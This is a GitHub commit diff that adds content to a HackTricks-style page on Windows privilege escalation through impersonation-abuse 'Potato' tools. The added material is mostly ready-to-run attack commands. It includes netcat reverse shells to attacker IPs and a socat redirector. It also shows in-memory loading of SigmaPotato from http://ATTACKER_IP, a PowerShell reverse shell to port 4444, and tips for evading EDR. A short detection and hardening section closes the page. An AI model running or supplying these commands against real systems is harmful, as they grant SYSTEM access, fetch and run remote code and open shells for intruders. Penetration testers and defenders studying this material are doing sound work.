Skip to content

Commit e3c5f26

Browse files
author
HackTricks News Bot
committed
Add content from: Research Update: Enhanced src/windows-hardening/windows-loca...
1 parent 365e44e commit e3c5f26

1 file changed

Lines changed: 93 additions & 3 deletions

File tree

src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

Lines changed: 93 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -4,6 +4,42 @@
44

55
> [!WARNING] > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
66
7+
> Note: A modern alternative frequently maintained in 2024–2025 is SigmaPotato (a fork of GodPotato) which adds in-memory/.NET reflection usage and extended OS support. See quick usage below and the repo in References.
8+
9+
Related pages for background and manual techniques:
10+
11+
{{#ref}}
12+
seimpersonate-from-high-to-system.md
13+
{{#endref}}
14+
15+
{{#ref}}
16+
from-high-integrity-to-system-with-name-pipes.md
17+
{{#endref}}
18+
19+
{{#ref}}
20+
privilege-escalation-abusing-tokens.md
21+
{{#endref}}
22+
23+
## Requirements and common gotchas
24+
25+
All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges:
26+
27+
- SeImpersonatePrivilege (most common) or SeAssignPrimaryTokenPrivilege
28+
- High integrity is not required if the token already has SeImpersonatePrivilege (typical for many service accounts such as IIS AppPool, MSSQL, etc.)
29+
30+
Check privileges quickly:
31+
32+
```cmd
33+
whoami /priv | findstr /i impersonate
34+
```
35+
36+
Operational notes:
37+
38+
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
39+
- RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
40+
- EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
41+
- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running.
42+
743
## Quick Demo
844

945
### PrintSpoofer
@@ -23,6 +59,10 @@ NULL
2359

2460
```
2561

62+
Notes:
63+
- You can use -i to spawn an interactive process in the current console, or -c to run a one-liner.
64+
- Requires Spooler service. If disabled, this will fail.
65+
2666
### RoguePotato
2767

2868
```bash
@@ -31,6 +71,16 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l
3171
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
3272
```
3373

74+
If outbound 135 is blocked, pivot the OXID resolver via socat on your redirector:
75+
76+
```bash
77+
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
78+
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
79+
80+
# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
81+
RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999
82+
```
83+
3484
### SharpEfsPotato
3585

3686
```bash
@@ -71,6 +121,13 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su
71121
nt authority\system
72122
```
73123
124+
Tip: If one pipe fails or EDR blocks it, try the other supported pipes:
125+
126+
```text
127+
EfsPotato <cmd> [pipe]
128+
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
129+
```
130+
74131
### GodPotato
75132
76133
```bash
@@ -79,10 +136,44 @@ nt authority\system
79136
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
80137
```
81138
139+
Notes:
140+
- Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
141+
82142
### DCOMPotato
83143
84144
![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
85145
146+
DCOMPotato provides two variants targeting service DCOM objects that default to RPC_C_IMP_LEVEL_IMPERSONATE. Build or use the provided binaries and run your command:
147+
148+
```cmd
149+
# PrinterNotify variant
150+
PrinterNotifyPotato.exe "cmd /c whoami"
151+
152+
# McpManagementService variant (Server 2022 also)
153+
McpManagementPotato.exe "cmd /c whoami"
154+
```
155+
156+
### SigmaPotato (updated GodPotato fork)
157+
158+
SigmaPotato adds modern niceties like in-memory execution via .NET reflection and a PowerShell reverse shell helper.
159+
160+
```powershell
161+
# Load and execute from memory (no disk touch)
162+
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
163+
[SigmaPotato]::Main("cmd /c whoami")
164+
165+
# Or ask it to spawn a PS reverse shell
166+
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
167+
```
168+
169+
## Detection and hardening notes
170+
171+
- Monitor for processes creating named pipes and immediately calling token-duplication APIs followed by CreateProcessAsUser/CreateProcessWithTokenW. Sysmon can surface useful telemetry: Event ID 1 (process creation), 17/18 (named pipe created/connected), and command lines spawning child processes as SYSTEM.
172+
- Spooler hardening: Disabling the Print Spooler service on servers where it isn’t needed prevents PrintSpoofer-style local coercions via spoolss.
173+
- Service account hardening: Minimize assignment of SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege to custom services. Consider running services under virtual accounts with least privileges required and isolating them with service SID and write-restricted tokens when possible.
174+
- Network controls: Blocking outbound TCP/135 or restricting RPC endpoint mapper traffic can break RoguePotato unless an internal redirector is available.
175+
- EDR/AV: All of these tools are widely signatured. Recompiling from source, renaming symbols/strings, or using in-memory execution can reduce detection but won’t defeat solid behavioral detections.
176+
86177
## References
87178
88179
- [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
@@ -92,8 +183,7 @@ nt authority\system
92183
- [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
93184
- [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
94185
- [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
186+
- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
187+
- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
95188
96189
{{#include ../../banners/hacktricks-training.md}}
97-
98-
99-

0 commit comments

Comments
 (0)